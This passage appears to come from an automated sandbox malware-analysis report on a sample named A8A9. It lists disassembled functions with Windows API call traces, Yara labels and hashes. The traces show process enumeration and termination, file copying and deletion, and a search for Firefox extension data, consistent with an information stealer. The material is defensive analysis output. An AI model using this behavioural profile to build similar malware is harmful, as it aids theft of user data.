                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                    • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                                                    • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                    • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                                                    Function 02D1D9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1DA68
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1DC06
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1DC1A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1DC99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                    • Instruction ID: 014d8080af86839a601aece155da41f6cedaa91a2b69ea7371b1eea655a970bb
                                                                                    • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                    • Instruction Fuzzy Hash: AA81BC75910228EACB08EBA4DD94DEE733AEF64708F504569E106A6690EF346E4CCF71
                                                                                    Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 998311485-3310892237
                                                                                    • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                    • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                                                    • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                    • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                                                    Function 02D29737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D29752
                                                                                      • Part of subcall function 02D28FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02D29785,00000000), ref: 02D28FC2
                                                                                      • Part of subcall function 02D28FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D28FC9
                                                                                      • Part of subcall function 02D28FB7: wsprintfW.USER32 ref: 02D28FDF
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02D29812
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02D29830
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D2983D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3729781310-0
                                                                                    • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                    • Instruction ID: 7350d8722f02b562392b8219a75493f4c86b2d71a2947d9514506ea9735667dd
                                                                                    • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                    • Instruction Fuzzy Hash: 20311575E00258EFDB14DFE0CC58BEDB7B9EB58704F204459E506AA284DB74AA88CF51
                                                                                    Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004194EB
                                                                                      • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                      • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                      • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 396451647-0
                                                                                    • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                    • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                                                    • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                    • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                                                    Function 02D288E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02D28931
                                                                                    • Process32First.KERNEL32(?,00000128), ref: 02D28945
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 02D2895A
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • CloseHandle.KERNEL32(?), ref: 02D289C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1066202413-0
                                                                                    • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                    • Instruction ID: 88a944fdca230136a5e669f02c12b6c7a7cf6fd5b6935a62f3b62b278af5935d
                                                                                    • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                    • Instruction Fuzzy Hash: 16316071941228EBCB24DF94DD44FEEB779EF55708F104199E10AA22A0DB346F88CFA1
                                                                                    Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                                                    • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • CloseHandle.KERNEL32(?), ref: 00418761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1066202413-0
                                                                                    • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                    • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                                                    • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                    • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                                                    Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                                                    • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                                                    • lstrcatA.KERNEL32(?,02E35DD0), ref: 00414FAB
                                                                                    • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2667927680-0
                                                                                    • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                    • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                                                    • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                    • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                                                    Function 02D21A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcessstrtok_s
                                                                                    • String ID:
                                                                                    • API String ID: 3407564107-0
                                                                                    • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                    • Instruction ID: 6212ecdd1e18e84e33a811d7b2e5723e934460af97f8d04a47aefa9393dbd0af
                                                                                    • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                    • Instruction Fuzzy Hash: CD115BB4900219EFCB04DFE4D948AEDBB75FF14309F108469E80967250E7309B09CF65
                                                                                    Function 02D27BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02D27C17
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27C1E
                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02D27C2B
                                                                                    • wsprintfA.USER32 ref: 02D27C5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 377395780-0
                                                                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction ID: 5d369438283fd5fd32bccd48524d73adf3b612896cb61043e73a551f07d13a3f
                                                                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction Fuzzy Hash: 651139B2944118ABCB14DFD9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                                                                    Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                                                    • wsprintfA.USER32 ref: 004179F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1243822799-0
                                                                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                                                    Function 02D27C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02D27CCA
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27CD1
                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02D27CE4
                                                                                    • wsprintfA.USER32 ref: 02D27D1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3317088062-0
                                                                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction ID: 1d3ae8b873f91a4cde50e1d00736e3cbdc58c2248730e3f7b9e3a88c16cbb115
                                                                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction Fuzzy Hash: D4115EB1A45228EFEB208B54DC49FA9B7B8FB05721F10439AE51AA32C0C7745944CF51
                                                                                    Function 02D23880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s
                                                                                    • String ID:
                                                                                    • API String ID: 3330995566-0
                                                                                    • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                    • Instruction ID: d10518f97321af8204f5c33a4c09d35e959741170ee3d7c7a4d5c1c6232f5eb8
                                                                                    • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                    • Instruction Fuzzy Hash: 621106B4E00219EFDB14CFE6D948BEEBBB9FB14709F10C029E425AA250D7789905CF55
                                                                                    Function 02D29547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(02D23D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02D23D55,?), ref: 02D29563
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,02D23D55), ref: 02D29580
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 02D2958E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                    • String ID:
                                                                                    • API String ID: 1378416451-0
                                                                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction ID: 5af9233eb822fc5f47dd06113751a2544a54284ff6ec565cb2aa81bbfb62a6f5
                                                                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction Fuzzy Hash: 6BF01939F40208BBDB20DFB0DC59BDA77BAAB49710F208694BA11A7280D6359A058B40
                                                                                    Function 02D26D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D31
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D26D4F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D26D60
                                                                                    • Sleep.KERNEL32(00001770), ref: 02D26D6B
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D81
                                                                                    • ExitProcess.KERNEL32 ref: 02D26D89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                    • String ID:
                                                                                    • API String ID: 941982115-0
                                                                                    • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                    • Instruction ID: 9fd2416f0b4f89e1a53fb981ee7640f479d13ac962ea776039b910b6bdd0a1d0
                                                                                    • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                    • Instruction Fuzzy Hash: B9F05478580329EFE710ABE1DC04BBD7679EB25749F101514F50255390DBB0C909CEA6
                                                                                    Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
